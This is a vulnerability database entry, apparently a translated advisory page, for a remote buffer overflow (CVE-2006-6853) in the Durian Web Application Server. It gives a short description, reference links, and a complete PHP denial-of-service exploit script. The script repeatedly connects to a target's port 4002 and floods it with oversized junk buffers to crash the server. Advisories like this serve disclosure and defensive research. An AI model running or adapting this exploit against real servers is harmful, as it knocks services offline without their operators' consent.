Durian Web Application Server Malformed Request Remote Buffer Overflow Vulnerability

Vulnerability ID 1111899 Vulnerability type Buffer overflow
Published 2006-12-29 Updated 2007-01-04
CVE ID CVE-2006-6853 CNNVD-ID CNNVD-200612-713
Platform Windows CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/3038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-713
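|Vulnerability details
Durian is a free web application server used to generate interactive, dynamic web content in the APS or DWS languages. Durian has a buffer overflow vulnerability in its handling of maliciously malformed requests, which a remote attacker can exploit to cause a denial of service or execute arbitrary instructions.
|Exploit (EXP)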
<?php
//Durian Web Application Server 3.02 freeware for Win32 denial of service exploit
//this will merely show 1000 access violation boxes to screen
//software site -> http://sourceforge.net/projects/durian/

//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org

error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";

$ch  =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;

for ($m=1; $m<=$c; $m++){
    for ($j=0; $j<3; $j++){
        for ($i=0; $i<8; $i++){
            $junk="";
            for ($k=1; $k<=$size[$i]; $k++){
                $junk.=$ch[$j];
            }
            echo "buf size:".$size[$i]."|char:".$ch[$j]."\n";
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            // socket_create() returns false on failure, not a negative value
            if ($socket === false) {
                die("socket_create() failed:\n reason: " . socket_strerror(socket_last_error()) . "\n");
            }
            $result = socket_connect($socket, $address, $service_port);
            // socket_connect() also returns false on failure
            if ($result === false) {
                die("socket_connect() failed:\n reason: " . socket_strerror(socket_last_error($socket)) . "\n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
    }
    sleep(1);
}
?>

# milw0rm.com [2006-12-29]
|References

Source: XF
Name: durian-web-bo(31161)
Link: http://xforce.iss.net/xforce/xfdb/31161
Source: BID
Name: 21808
Link: http://www.securityfocus.com/bid/21808
Source: MILW0RM
Name: 3038
Link: http://www.milw0rm.com/exploits/3038
Source: MILW0RM
Name: 3037
Link: http://www.milw0rm.com/exploits/3037
Source: SECTRACK
Name: 1017456
Link: http://securitytracker.com/id?1017456
Source: MILW0RM
Name: 3038
Link: http://milw0rm.com/exploits/3038
Source: MILW0RM
Name: 3037
Link: http://milw0rm.com/exploits/3037
Source: NSFOCUS
Name: 9745
Link: http://www.nsfocus.net/vulndb/9745